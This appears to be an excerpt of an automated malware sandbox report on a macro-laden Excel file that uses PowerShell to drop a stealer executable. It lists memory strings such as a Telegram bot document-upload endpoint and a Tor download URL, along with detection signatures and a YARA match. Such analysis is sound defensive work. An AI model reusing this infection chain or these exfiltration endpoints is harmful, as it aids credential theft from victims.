                Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://analysis.windows.net/powerbi/api
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://api.aadrm.com/
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://api.diagnostics.office.com
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://api.diagnosticssdf.office.com
                Source: kzsuoseu.exe, 00000020.00000002.517955962.00000000028D1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.orgGETMozilla/5.0
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://api.microsoftstream.com/api/
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://api.office.net
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://api.onedrive.com
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
                Source: kzsuoseu.exe, 0000001A.00000002.511700350.00000000041C1000.00000004.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.509493809.00000000035B6000.00000004.00000001.sdmp, kzsuoseu.exe, 0000001E.00000002.512846183.0000000000402000.00000040.00000001.sdmp, kzsuoseu.exe, 00000020.00000002.512857021.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot%telegramapi%/
                Source: kzsuoseu.exe, 0000001E.00000002.517410050.0000000002F81000.00000004.00000001.sdmp, kzsuoseu.exe, 00000020.00000002.517955962.00000000028D1000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------x
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://apis.live.net/v5.0/
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://arc.msn.com/v4/api/selection
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://augloop.office.com
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://augloop.office.com/v2
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://autodiscover-s.outlook.com
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://cdn.entity.
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://clients.config.office.net/
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://config.edge.skype.com
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
                Source: powershell.exe, 00000016.00000002.483459568.0000022B90060000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000016.00000002.483459568.0000022B90060000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000016.00000002.483459568.0000022B90060000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://cortana.ai
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://cr.office.com
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://dataservice.o365filtering.com
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://dataservice.o365filtering.com/
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://devnull.onenote.com
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://directory.services.
                Source: vlc.exe.28.drString found in binary or memory: https://discord.com/
                Source: powershell.exe, 00000015.00000002.467351207.000001F1AB300000.00000004.00000001.sdmp, kzsuoseu.exe, 0000001A.00000000.446951571.0000000000E32000.00000002.00020000.sdmp, kzsuoseu.exe, 0000001C.00000002.505256342.0000000000F42000.00000002.00020000.sdmp, kzsuoseu.exe, 0000001E.00000002.513514027.0000000000BA2000.00000002.00020000.sdmp, kzsuoseu.exe, 0000001F.00000000.504629114.0000000000332000.00000002.00020000.sdmp, kzsuoseu.exe, 00000020.00000002.513169061.0000000000512000.00000002.00020000.sdmp, vlc.exe.28.drString found in binary or memory: https://discord.com/4
                Source: powershell.exe, 00000015.00000002.467351207.000001F1AB300000.00000004.00000001.sdmp, kzsuoseu.exe, 0000001A.00000000.446951571.0000000000E32000.00000002.00020000.sdmp, kzsuoseu.exe, 0000001C.00000002.505256342.0000000000F42000.00000002.00020000.sdmp, kzsuoseu.exe, 0000001E.00000002.513514027.0000000000BA2000.00000002.00020000.sdmp, kzsuoseu.exe, 0000001F.00000000.504629114.0000000000332000.00000002.00020000.sdmp, kzsuoseu.exe, 00000020.00000002.513169061.0000000000512000.00000002.00020000.sdmp, vlc.exe.28.drString found in binary or memory: https://discord.com/8
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://ecs.office.com/config/v2/Office
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://entitlement.diagnostics.office.com
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
                Source: powershell.exe, 00000016.00000002.461243682.0000022B80213000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://globaldisco.crm.dynamics.com
                Source: powershell.exe, 00000016.00000002.480623609.0000022B81CA4000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://graph.ppe.windows.net
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://graph.ppe.windows.net/
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://graph.windows.net
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://graph.windows.net/
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://incidents.diagnostics.office.com
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://lifecycle.office.com
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://login.microsoftonline.com/
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://login.windows.local
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://management.azure.com
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://management.azure.com/
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://messaging.office.com/
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://ncus-000.contentsync.
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://ncus-000.pagecontentsync.
                Source: powershell.exe, 00000015.00000002.476805076.000001F1BA660000.00000004.00000001.sdmp, powershell.exe, 00000016.00000002.483459568.0000022B90060000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://officeapps.live.com
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://officeci.azurewebsites.net/api/
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://onedrive.live.com
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://onedrive.live.com/embed?
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://outlook.office.com
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://outlook.office365.com
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://powerlift.acompli.net
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://settings.outlook.com
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://shell.suite.office.com:1443
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://skyapi.live.net/Activity/
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://store.office.cn/addinstemplate
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://store.office.com/addinstemplate
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://store.office.de/addinstemplate
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://store.officeppe.com/addinstemplate
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://tasks.office.com
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://templatelogging.office.com/client/log
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://web.microsoftstream.com/video/
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://wus2-000.contentsync.
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://wus2-000.pagecontentsync.
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
                Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.drString found in binary or memory: https://www.odwebp.svc.ms
                Source: kzsuoseu.exe, 0000001A.00000002.511700350.00000000041C1000.00000004.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.509493809.00000000035B6000.00000004.00000001.sdmp, kzsuoseu.exe, 0000001E.00000002.512846183.0000000000402000.00000040.00000001.sdmp, kzsuoseu.exe, 00000020.00000002.512857021.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                Source: kzsuoseu.exe, 0000001E.00000002.517410050.0000000002F81000.00000004.00000001.sdmp, kzsuoseu.exe, 00000020.00000002.517955962.00000000028D1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

                System Summary:

                barindex
                Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                Source: Screenshot number: 12Screenshot OCR: Enable Content : lj, 5 6 7 " _ _ _="1 - 8 9 10 . . 11 " 12 Microsoft Excel X 13 14 ! Wa
                Powershell drops PE fileShow sources
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\kzsuoseu.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFA18D809AB
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFA18D80DAA
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFA18D81BAA
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFA18D81C08
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFA18D80BAA
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFA18D81BAA
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFA18D81C08
                Source: C:\Users\Public\kzsuoseu.exeCode function: 26_2_015CC284
                Source: C:\Users\Public\kzsuoseu.exeCode function: 26_2_015CE650
                Source: C:\Users\Public\kzsuoseu.exeCode function: 26_2_015CE640
                Source: C:\Users\Public\kzsuoseu.exeCode function: 26_2_015CFCCA
                Source: C:\Users\Public\kzsuoseu.exeCode function: 28_2_032FC284
                Source: C:\Users\Public\kzsuoseu.exeCode function: 28_2_032FE640
                Source: C:\Users\Public\kzsuoseu.exeCode function: 28_2_032FE650
                Source: C:\Users\Public\kzsuoseu.exeCode function: 30_2_01554800
                Source: C:\Users\Public\kzsuoseu.exeCode function: 30_2_01553D2C
                Source: C:\Users\Public\kzsuoseu.exeCode function: 30_2_015554F0
                Source: C:\Users\Public\kzsuoseu.exeCode function: 30_2_01554770
                Source: C:\Users\Public\kzsuoseu.exeCode function: 30_2_015547F2
                Source: C:\Users\Public\kzsuoseu.exeCode function: 32_2_02674800
                Source: C:\Users\Public\kzsuoseu.exeCode function: 32_2_02674710
                Source: x2hGv.xlsOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                Source: x2hGv.xlsOLE indicator, VBA macros: true
                Source: Joe Sandbox ViewDropped File: C:\Users\Public\kzsuoseu.exe BE48A66B718F94C2379453FF845E0047504573E3C0E1A9F7AB3011DAB1C06B57
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe BE48A66B718F94C2379453FF845E0047504573E3C0E1A9F7AB3011DAB1C06B57
                Source: kzsuoseu.exe.21.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: kzsuoseu.exe.21.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: kzsuoseu.exe.21.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: vlc.exe.28.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: vlc.exe.28.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: vlc.exe.28.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: x2hGv.xls, type: SAMPLEMatched rule: PowerShell_in_Word_Doc date = 2017-06-27, author = Florian Roth, description = Detects a powershell and bypass keyword in a Word document, reference = Internal Research - ME, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 4fd4a7b5ef5443e939015276fc4bf8ffa6cf682dd95845ef10fdf8158fdd8905
                Source: kzsuoseu.exe.21.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: vlc.exe.28.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: classification engineClassification label: mal100.troj.evad.winXLS@17/13@3/2
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5164:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5160:120:WilError_01
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{22275D7D-8F7B-48FE-9807-4A9572013335} - OProcSessId.datJump to behavior
                Source: x2hGv.xlsOLE indicator, Workbook stream: true
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                Source: C:\Users\Public\kzsuoseu.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\Public\kzsuoseu.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\Public\kzsuoseu.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\Public\kzsuoseu.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
